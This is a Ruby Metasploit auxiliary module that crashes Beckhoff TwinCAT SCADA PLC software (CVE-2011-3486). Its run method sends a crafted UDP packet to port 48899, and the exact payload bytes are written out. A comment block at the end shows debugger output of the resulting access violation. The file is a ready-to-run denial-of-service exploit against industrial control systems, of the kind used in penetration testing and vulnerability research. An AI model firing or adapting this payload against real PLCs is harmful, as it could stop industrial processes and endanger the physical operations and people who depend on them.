metasploit-framework/modules/auxiliary/dos/scada/beckhoff_twincat.rb

70 lines
2.2 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS',
'Description' => %q{
The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending
a crafted UDP packet to port 48899 (TCATSysSrv.exe).
},
'Author' =>
[
'Luigi Auriemma', # Public exploit
'jfa', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3486' ],
[ 'OSVDB', '75495' ],
[ 'URL', 'http://aluigi.altervista.org/adv/twincat_1-adv.txt' ]
],
'DisclosureDate' => 'Sep 13 2011'
))
register_options([Opt::RPORT(48899)])
end
def run
dos = "\x03\x66\x14\x71" + "\x00"*16 + "\xff"*1514
connect_udp
print_status("Sending DoS packet ...")
udp_sock.put(dos)
disconnect_udp
end
end
=begin
0:017> g
(4d4.850): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02a1f9cf ebx=0037c0a8 ecx=02a0f9cc edx=ffffffff esi=02a0f9b4 edi=00000001
eip=00414f6a esp=02a0f7bc ebp=0000ffff iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
*** ERROR: Module load completed but symbols could not be loaded for C:\TwinCAT\TCATSysSrv.exe
TCATSysSrv+0x14f6a:
00414f6a 66833802 cmp word ptr [eax],2 ds:0023:02a1f9cf=????
0:016> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
02a0f7f8 71ab265b TCATSysSrv+0x14f6a
02a0f80c 71ab4a9e WS2_32!Prolog_v1+0x21
02a0f834 7c90df3c WS2_32!WPUQueryBlockingCallback+0x1b
02a0f880 71a5332f ntdll!NtWaitForSingleObject+0xc
02a0f8f4 71abf6e7 mswsock!WSPRecvFrom+0x35c
02a0f938 71ad303a WS2_32!WSARecvFrom+0x7d
02a0f96c 00414b92 WSOCK32!recvfrom+0x39
02a0f988 00000000 TCATSysSrv+0x14b92
=end